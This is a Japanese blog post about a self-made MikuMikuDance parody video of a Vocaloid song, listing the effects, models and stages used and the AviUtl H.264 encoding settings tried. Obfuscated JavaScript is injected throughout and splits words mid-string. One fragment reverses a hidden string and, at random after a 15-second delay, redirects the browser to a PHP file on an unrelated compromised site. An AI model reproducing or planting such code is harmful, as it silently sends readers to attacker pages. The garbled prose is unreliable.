投稿しました「【GUMI】ボカマス★ナイトフィーバー【替え歌】」

今回投稿した動画です。

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm17347238″]

ぼかます生をテーマに替え歌にしてみました。
超ローカルネタ。

恒例の映像でしようしたもの一覧

■使用したMME
・改変ディフュージョンフィルタ v0.4
・モーションブラーエフェクト Ver.2.0
・AutoLuminous Ver.2.0
 ライトとか、いろいろ光らせるため
・XDOF Ver.2.2
 カメラのピントみたいに、ピントがあっていないところをぼかします。
・SeriousShadom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der.fx v0.2
 しはすいさんから、このシェーダを使っているとのコメントをもらったので使ってみました。
 「PostAdultShadom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der.fx」とセットで使用しています。
 これは、モデルごとに割り当てが必要です。
 MMDを起動し直すと設定がなくなっているから、忘れずに毎回設定してます。
 設定が解除されるのは仕様なのだろうか。それとも、私だけ?
・PostAdultShadom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der.fx v0.13
 ということでこちらをセットで使用。これはアクセサリで読み込むだけです。
・SSAO
 奥行きのある感じの質感?色調?な感じ?言葉でうまく説明できない。

■使用したモデル
・Lat式ミクぷちミク
・GUMIβ
・バケちは
・千早 ゴシックプリンセス
・五体合体グレートキサラギ
・DIVAっぽいMEIKO
・DIVA風ミク_ver.1.05α
・歌愛ユキ_n式ver1.03
・デフォ子(唄音ウタ)Ver.2.4a

■使用したアクセサリ類
・鉄塔ステージ ver.1.0
・イベントステージ ver.1.1
・天空セット(環境3.0)

■3DCG動画作成ツール
・MikuMikuDance Ver.7.39

■使用したモーション
・【MMD】DanceVidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deo ルカルカ★ナイトフィーバー【こずえ】
 dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}/*$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["\'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deo.jp/watch/sm7821565″ target=”_blank”>http://www.nicovidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deo.jp/watch/sm7821565
 [nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm7821565″]



今回苦労したことは、エンコードするとものすごく汚くなるのでどうやって綺麗にするかでした。
1.5MBでエンコードしても、ものすごく汚かったです。

そのため、最初の方は、大人しめのステージにしてエンコードに優しくしてみたり
色々と試してみました。

結論としては、ビットレート1.5Mで色々試したけど納得できる画質にはなりませんでした。
ウィンドウを最大にしてみなければそこまでわからないですが、最後の方は、どうせローカルネタなんだから
多くの人がいるわけでもないからビットレート2Mにしちゃえ・・・

となってしましました。
何回もエンコードしたのは、勉強だと思っておくことにします。

何度も何度もエンコードしていたので、エンコードだけで10時間以上やってました。

aviutlの設定(MP4エンコードのためプラグイン使用)



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
H.264 Leverlは3.1のところを、今回はビットレート高めなので4.1にしてみました。
ビットレート1.5MBでH.264 Leverlは3.1だと、映像が汚すぎて話になりませんでした。
プリセットのロードはslowにしています。veryslowにすると一眠りできるくらい時間かかりました。
それでもそんなに映像は良くなかったこともあり、今回は、最後はslowでいいかと日和してしましした。

veryslowで数回やりましたが、さすがに試行するのに時間がかかり過ぎなので時間的にあきめました。
今回は3回エンコードする設定にしていたので、私のPCで1時間かかりました。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
AQのモードをAutoVAQにしましたが、そんなに変化なかった気がします。




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
動きの予測は、Hadamard ESA(低速)という一番遅いやつを選択。少しでも画質を良くしようとチャレンジ。
サブピクセル動きを予測も11(Full RD)を選択。(一番いいやつ)

キーフレーム間隔の上限は600にしています。(60fpsの動画だったため)
fpsの10倍の値を入力するらしいです。

コメントを残す